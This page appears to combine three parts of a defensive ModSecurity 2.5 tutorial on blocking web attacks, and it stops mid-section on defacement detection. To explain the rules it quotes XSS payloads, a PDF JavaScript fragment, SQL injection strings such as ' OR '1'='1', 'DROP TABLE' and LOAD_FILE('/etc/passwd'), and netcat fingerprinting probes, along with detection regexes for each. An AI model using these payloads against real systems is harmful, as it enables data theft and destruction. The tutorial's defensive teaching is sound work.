How-To Tutorials - Security

174 Articles

Blocking Common Attacks using ModSecurity 2.5: Part 2

Packt
01 Dec 2009
11 min read
Cross-site scripting

Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different than scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail at how to prevent these attacks.

The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The actual vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.)

Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed and injection of arbitrary content into web pages. Cross-site scripting attacks can generally be divided into two categories:

- Reflected attacks: This kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute.
- Stored attacks: In this type of XSS attack, the attacker is able to include his malicious payload in data that is permanently stored on the server and will be served without any HTML entity encoding to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging since it can affect every user who views a certain page.

Preventing XSS attacks

The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angle brackets (< and >), with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;.

Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages:

Character   HTML-encoded version
<           &lt;
>           &gt;
(           &#40;
)           &#41;
#           &#35;
&           &amp;
"           &quot;
'           &#39;

In PHP, you can use the htmlentities() function to achieve this.
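To make the encoding step concrete, here is a minimal PHP sketch of the idea (the comment parameter and the surrounding page are made up for illustration). htmlentities() with ENT_QUOTES takes care of the angle brackets, ampersand, and both quote characters from the table above; the parentheses and hash character are not converted by htmlentities(), so the extra strtr() call is only needed if you want to encode the complete list.

```php
<?php
// User-supplied data that will be echoed back into the page.
$comment = isset($_GET['comment']) ? $_GET['comment'] : '';

// Encode the HTML-significant characters: < > & " '
$safe = htmlentities($comment, ENT_QUOTES, 'UTF-8');

// Optionally encode the remaining characters from the table above.
$safe = strtr($safe, array(
    '(' => '&#40;',
    ')' => '&#41;',
    '#' => '&#35;',
));

// The encoded value is now displayed as text instead of being
// interpreted as markup by the browser.
echo '<p>Your comment: ' . $safe . '</p>';
```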
When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser.

In general, users should not be allowed to input any HTML markup tags if it can be avoided. If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places, then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows:

<a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a>

This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown.

I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them:

Script fragment   Regular expression
<script           <script
eval(             eval\s*\(
onMouseOver       onmouseover
onMouseOut        onmouseout
onMouseDown       onmousedown
onMouseMove       onmousemove
onClick           onclick
onDblClick        ondblclick
onFocus           onfocus

PDF XSS protection

You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary.

In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment.

The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern.

The basic attack works like this: an attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this:

http://www.example.com/document.pdf#x=javascript:alert('XSS');

Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign; gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before.

The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files.
The aim is to convert any URLs like the following:

http://www.example.com/document.pdf#x=javascript:alert('XSS');

into a redirected URL that has its own hash character:

http://www.example.com/document.pdf#protection

This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing which is the first request for the PDF file and which is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. The redirect link now looks like this:

http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection

ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user; he will just have to download it to the hard drive.

These are the directives used to configure PDF XSS protection in ModSecurity:

SecPdfProtect On
SecPdfProtectMethod TokenRedirection
SecPdfProtectSecret "SecretString"
SecPdfProtectTimeout 10
SecPdfProtectTokenName "token"

The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this.

SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant it (for example, if a new PDF vulnerability of the same class is discovered in the future).

HttpOnly cookies to prevent XSS attacks

One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies. This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers:

- Internet Explorer (IE6 SP1 and later)
- Firefox (2.0.0.5 and later)
- Google Chrome (all versions)
- Safari (3.0 and later)
- Opera (version 9.50 and later)

HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via, for example, the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as session IDs.

A cookie header with the HttpOnly flag set looks like this:

Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly

HttpOnly cookies need to be supported on the server side for clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option.
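If you control the application code, the flag can also be set directly when a cookie is issued. Here is a minimal PHP sketch (the cookie name and value are taken from the example header above; everything else is illustrative); setcookie() accepts the HttpOnly flag as its seventh parameter in PHP 5.2.0 and later.

```php
<?php
// setcookie(name, value, expire, path, domain, secure, httponly)
// The final "true" asks the browser to withhold this cookie from
// client-side script such as document.cookie.
setcookie('SESSID', 'd31cd4f599c4b0fa4158c6fb', 0, '/', '', false, true);
```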
For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call:

<?php
  ini_set("session.cookie_httponly", 1);
?>

Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so:

<Context useHttpOnly="true">
</Context>

In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now.

Session identifiers

Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages:

Language   Session identifier cookie name
PHP        PHPSESSID
JSP        JSESSIONID
ASP        ASPSESSIONID
ASP.NET    ASP.NET_SessionId

The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server:

echo -e "GET / HTTP/1.1\nHost: yourserver.com\n\n" | nc yourserver.com 80 | head

Look for a line similar to:

Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/

This is the session cookie—in this case its name is JSESSIONID, since the server is running Tomcat and the JSP web application language.

The following rules are used to add the HttpOnly flag to session cookies:

#
# Add HttpOnly flag to session cookies
#
SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass"
SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_cookie=%{MATCHED_VAR}"
Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_cookie

We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match. Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
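To verify from the outside that your session cookie really is being sent with the HttpOnly flag, the netcat check above can also be scripted. The following PHP sketch is one way to do it (the URL is a placeholder): it fetches the response headers with get_headers() and reports whether each Set-Cookie header carries HttpOnly.

```php
<?php
// Hypothetical URL of the application to check.
$url = 'http://yourserver.com/';

// get_headers() issues a request and returns the raw response headers.
$headers = get_headers($url);

foreach ($headers as $header) {
    if (stripos($header, 'Set-Cookie:') === 0) {
        $status = (stripos($header, 'HttpOnly') !== false)
            ? 'has the HttpOnly flag'
            : 'is MISSING the HttpOnly flag';
        echo $header . "\n  -> this cookie " . $status . "\n";
    }
}
```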


Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited:

- The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted.
- The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file.
- Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities.
- Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data.

HTTP fingerprinting

Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play.

We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system.

More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers.

We will be focusing on two fingerprinting tools:

- httprint: One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD.
- httprecon: This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows.
Let's first run httprecon against a standard Apache 2.2 server, and then run httprint against the same server. Both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x.

Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/.

Tip: If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname.

The fact that both tools are able to identify the server should come as no surprise, as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software.

How HTTP fingerprinting works

There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones.

Server banner

The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner:

# Change the server banner to MyServer 1.0
ServerTokens Full
SecServerSignature "MyServer 1.0"

Response header

The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges.

HTTP protocol responses

Another way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server.

Issuing an HTTP DELETE request

The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page?

Here is a DELETE request issued to our Apache server:

$ nc bytelayer.com 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Mon, 27 Apr 2009 09:10:49 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method DELETE is not allowed for the URL /index.html.</p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

As we can see, the server returned a 405 - Method Not Allowed error.
The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL /index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net:

$ nc www.iis.net 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 27 Apr 2009 09:22:34 GMT
Connection: close
Content-Length: 1293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>405 - HTTP verb used to access this page is not allowed.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>405 - HTTP verb used to access this page is not allowed.</h2>
<h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>
</fieldset></div>
</div>
</body>
</html>

The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however, there are many subtle differences in the way the response is generated. Here are just a few:

- IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not
- The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field
- IIS uses the error message "The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access" in the response body

Bad HTTP version numbers

A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request.
Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued:

$ nc bytelayer.com 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Date: Mon, 27 Apr 2009 09:36:10 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Content-Length: 295
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br /></p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does:

$ nc www.iis.net 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 27 Apr 2009 09:38:37 GMT
Connection: close
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Hostname</h2>
<hr><p>HTTP Error 400. The request hostname is invalid.</p>
</BODY></HTML>

We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
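If you would like to experiment with this kind of probing from a script instead of netcat, the same request can be sent over a raw socket. The following PHP sketch (the hostname is a placeholder; only probe servers you are allowed to test) sends a request with a bogus protocol version and prints whatever comes back, so you can compare status lines, header order, and error bodies between servers.

```php
<?php
// Hypothetical target host; replace with a server you are allowed to probe.
$host = 'www.example.com';

// Open a plain TCP connection to port 80.
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
    die("Connection failed: $errstr ($errno)\n");
}

// Send a request with a non-existent HTTP version, as in the examples above.
fwrite($fp, "GET / HTTP/5.0\r\nHost: $host\r\n\r\n");

// Print the raw response: status line, headers, and error body.
while (!feof($fp)) {
    echo fgets($fp, 1024);
}
fclose($fp);
```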


Blocking Common Attacks using ModSecurity 2.5: Part 3

Packt
01 Dec 2009
12 min read
Source code revelation

Normally, requesting a file with a .php extension will cause mod_php to execute the PHP code contained within the file and then return the resulting web page to the user. If the web server is misconfigured (for example if mod_php is not loaded) then the .php file will be sent by the server without interpretation, and this can be a security problem. If the source code contains credentials used to connect to an SQL database then that opens up an avenue for attack, and of course the source code being available will allow a potential attacker to scrutinize the code for vulnerabilities.

Preventing source code revelation is easy. With response body access on in ModSecurity, simply add a rule to detect the opening PHP tag:

# Prevent PHP source code from being disclosed
SecRule RESPONSE_BODY "<?" "deny,msg:'PHP source code disclosure blocked'"

Preventing Perl and JSP source code from being disclosed works in a similar manner:

# Prevent Perl source code from being disclosed
SecRule RESPONSE_BODY "#!/usr/bin/perl" "deny,msg:'Perl source code disclosure blocked'"

# Prevent JSP source code from being disclosed
SecRule RESPONSE_BODY "<%" "deny,msg:'JSP source code disclosure blocked'"

Directory traversal attacks

Normally, all web servers should be configured to reject attempts to access any document that is not under the web server's root directory. For example, if your web server root is /home/www, then attempting to retrieve /home/joan/.bashrc should not be possible since this file is not located under the /home/www web server root. The obvious attempt to access the /home/joan directory is, of course, easy for the web server to block; however, there is a more subtle way to access this directory which still allows the path to start with /home/www, and that is to make use of the .. symbolic directory link which links to the parent directory in any given directory.

Even though most web servers are hardened against this sort of attack, web applications that accept input from users may still not be checking it properly, potentially allowing users to get access to files they shouldn't be able to view via simple directory traversal attacks. This alone is reason to implement protection against this sort of attack using ModSecurity rules. Furthermore, keeping with the principle of Defense in Depth, having multiple protections against this vulnerability can be beneficial in case the web server should contain a flaw that allows this kind of attack in certain circumstances.

There is more than one way to validly represent the .. link to the parent directory. URL encoding of .. yields %2e%2e, and adding the final slash at the end we end up with %2e%2e%2f. Here, then, is a list of what needs to be blocked:

- ../
- ..%2f
- .%2e/
- %2e%2e%2f
- %2e%2e/
- %2e./

Fortunately, we can use the ModSecurity transformation t:urlDecode. This function does all the URL decoding for us, and will allow us to ignore the percent-encoded values, and thus only one rule is needed to block these attacks:

SecRule REQUEST_URI "../" "t:urlDecode,deny"

Blog spam

The rise of weblogs, or blogs, as a new way to present information, share thoughts, and keep an online journal has made way for a new phenomenon: blog comments designed to advertise a product or drive traffic to a website.
Blog spam isn't a security problem per se, but it can be annoying and cost a lot of time when you have to manually remove spam comments (or delete them from the approval queue, if comments have to be approved before being posted on the blog). Blog spam can be mitigated by collecting a list of the most common spam phrases, and using the ability of ModSecurity to scan POST data. Any attempted blog comment that contains one of the offending phrases can then be blocked.

From both a performance and maintainability perspective, using the @pmFromFile operator is the best choice when dealing with large word lists such as spam phrases. To create the list of phrases to be blocked, simply insert them into a text file, for example, /usr/local/spamlist.txt:

viagra
v1agra
auto insurance
rx medications
cheap medications
...

Then create ModSecurity rules to block those phrases when they are used in locations such as the page that creates new blog comments:

#
# Prevent blog spam by checking comment against known spam
# phrases in file /usr/local/spamlist.txt
#
<Location /blog/comment.php>
  SecRule ARGS "@pmFromFile /usr/local/spamlist.txt" "t:lowercase,deny,msg:'Blog spam blocked'"
</Location>

Keep in mind that the spam list file can contain whole sentences—not just single words—so be sure to take advantage of that fact when creating the list of known spam phrases.

SQL injection

SQL injection attacks can occur if an attacker is able to supply data to a web application that is then used in unsanitized form in an SQL query. This can cause the SQL query to do completely different things than intended by the developers of the web application. Consider an SQL query like this:

SELECT * FROM user WHERE username = '%s' AND password = '%s';

The flaw here is that if someone can provide a password that looks like ' OR '1'='1, then the query, with username and password inserted, will become:

SELECT * FROM user WHERE username = 'anyuser' AND password = '' OR '1'='1';

This query will return all users in the results table, since the OR '1'='1' part at the end of the statement will make the entire statement true no matter what username and password is provided.

Standard injection attempts

Let's take a look at some of the most common ways SQL injection attacks are performed.

Retrieving data from multiple tables with UNION

An SQL UNION statement can be used to retrieve data from two separate tables. If there is one table named cooking_recipes and another table named user_credentials, then the following SQL statement will retrieve data from both tables:

SELECT dish_name FROM cooking_recipes UNION SELECT username, password FROM user_credentials;

It's easy to see how the UNION statement can allow an attacker to retrieve data from other tables in the database if he manages to sneak it into a query. A similar SQL statement is UNION ALL, which works almost the same way as UNION—the only difference is that UNION ALL will not eliminate any duplicate rows returned in the result.

Multiple queries in one call

If the SQL engine allows multiple statements in a single SQL query, then seemingly harmless statements such as the following can present a problem:

SELECT * FROM products WHERE id = %d;

If an attacker is able to provide an ID parameter of 1; DROP TABLE products;, then the statement suddenly becomes:

SELECT * FROM products WHERE id = 1; DROP TABLE products;

When the SQL engine executes this, it will first perform the expected SELECT query, and then the DROP TABLE products statement, which will cause the products table to be deleted.
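To see how the quoted-password trick plays out in application code, and what the safe alternative looks like, here is a hedged PHP sketch (it assumes a PDO connection in $pdo and the user table from the example above; it is not code from the article):

```php
<?php
// UNSAFE: user input is concatenated straight into the SQL string.
// A password of  ' OR '1'='1  turns the WHERE clause into a tautology.
$unsafe = "SELECT * FROM user WHERE username = '" . $_POST['username'] .
          "' AND password = '" . $_POST['password'] . "'";

// SAFER: a prepared statement keeps data separate from SQL syntax,
// so the same input is treated as a literal value, not as SQL code.
$stmt = $pdo->prepare('SELECT * FROM user WHERE username = ? AND password = ?');
$stmt->execute(array($_POST['username'], $_POST['password']));
$rows = $stmt->fetchAll();
```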
Reading arbitrary files

MySQL can be used to read data from arbitrary files on the system. This is done by using the LOAD_FILE() function:

SELECT LOAD_FILE("/etc/passwd");

This command returns the contents of the file /etc/passwd. This works for any file to which the MySQL process has read access.

Writing data to files

MySQL also supports the command INTO OUTFILE, which can be used to write data into files. This attack illustrates how dangerous it can be to include user-supplied data in SQL commands, since with the proper syntax, an SQL command can not only affect the database, but also the underlying file system. This simple example shows how to use MySQL to write the string some data into the file test.txt:

mysql> SELECT "some data" INTO OUTFILE "test.txt";

Preventing SQL injection attacks

There are three important steps you need to take to prevent SQL injection attacks:

1. Use SQL prepared statements.
2. Sanitize user data.
3. Use ModSecurity to block SQL injection code supplied to web applications.

These are in order of importance, so the most important consideration should always be to make sure that any code querying SQL databases that relies on user input should use prepared statements. A prepared statement looks as follows:

SELECT * FROM books WHERE isbn = ? AND num_copies < ?;

This allows the SQL engine to replace the question marks with the actual data. Since the SQL engine knows exactly what is data and what is SQL syntax, this prevents SQL injection from taking place. The advantages of using prepared statements are twofold:

- They effectively prevent SQL injection.
- They speed up execution time, since the SQL engine can compile the statement once, and use the pre-compiled statement on all subsequent query invocations.

So not only will using prepared statements make your code more secure—it will also make it quicker.

The second step is to make sure that any user data used in SQL queries is sanitized. Any unsafe characters, such as single quotes, should be escaped. If you are using PHP, the function mysql_real_escape_string() will do this for you.

Finally, let's take a look at strings that ModSecurity can help block to prevent SQL injection attacks.

What to block

The following table lists common SQL commands that you should consider blocking, together with a suggested regular expression for blocking each one. The regular expressions are in lowercase and therefore assume that the t:lowercase transformation function is used.

SQL code          Regular expression
UNION SELECT      union\s+select
UNION ALL SELECT  union\s+all\s+select
INTO OUTFILE      into\s+outfile
DROP TABLE        drop\s+table
ALTER TABLE       alter\s+table
LOAD_FILE         load_file
SELECT *          select\s+\*

For example, a rule to detect attempts to write data into files using INTO OUTFILE looks as follows:

SecRule ARGS "into\s+outfile" "t:lowercase,deny,msg:'SQL Injection'"

The \s+ regular expression syntax allows for detection of an arbitrary number of whitespace characters. This will detect evasion attempts such as INTO%20%20OUTFILE where multiple spaces are used between the SQL command words.

Website defacement

We've all seen the news stories: "Large Company X was yesterday hacked and their homepage was replaced with an obscene message". This sort of thing is an everyday occurrence on the Internet. After the company SCO initiated a lawsuit against Linux vendors citing copyright violations in the Linux source code, the SCO corporate website was hacked and an image was altered to read WE OWN ALL YOUR CODE—pay us all your money.
The hack was subtle enough that the casual visitor to the SCO site would likely not be able to tell that this was not the official version of the homepage. The above image shows what the SCO homepage looked like after being defaced—quite subtle, don't you think?

Preventing website defacement is important for a business for several reasons:

- Potential customers will turn away when they see the hacked site
- There will be an obvious loss of revenue if the site is used for any sort of e-commerce sales
- Bad publicity will tarnish the company's reputation

Defacement of a site will of course depend on a vulnerability being successfully exploited. The measures we will look at here are aimed to detect that a defacement has taken place, so that the real site can be restored as quickly as possible.

Detection of website defacement is usually done by looking for a specific token in the outgoing web pages. This token has been placed within the pages in advance specifically so that it may be used to detect defacement—if the token isn't there then the site has likely been defaced. This can be sufficient, but it can also allow the attacker to insert the same token into his defaced page, defeating the detection mechanism. Therefore, we will go one better and create a defacement detection technology that will be difficult for the hacker to get around.

To create a dynamic token, we will be using the visitor's IP address. The reason we use the IP address instead of the hostname is that a reverse lookup may not always be possible, whereas the IP address will always be available.

The following example code in JSP illustrates how the token is calculated and inserted into the page:

<%@ page import="java.security.*" %>
<%
  String tokenPlaintext = request.getRemoteAddr();
  String tokenHashed = "";
  String hexByte = "";
  // Hash the IP address
  MessageDigest md5 = MessageDigest.getInstance("MD5");
  md5.update(tokenPlaintext.getBytes());
  byte[] digest = md5.digest();
  for (int i = 0; i < digest.length; i++) {
    hexByte = Integer.toHexString(0xFF & digest[i]);
    if (hexByte.length() < 2) {
      hexByte = "0" + hexByte;
    }
    tokenHashed += hexByte;
  }
  // Write MD5 sum token to HTML document
  out.println(String.format("<span style='color: white'>%s</span>", tokenHashed));
%>

Assuming the background of the page is white, the <span style="color: white"> markup will ensure it is not visible to website viewers.

Now for the ModSecurity rules to handle the defacement detection. We need to look at outgoing pages and make sure that they include the appropriate token. Since the token will be different for different users, we need to calculate the same MD5 sum token in our ModSecurity rule and make sure that this token is included in the output. If not, we block the page from being sent and sound the alert by sending an email message to the website administrator.

#
# Detect and block outgoing pages not containing our token
#
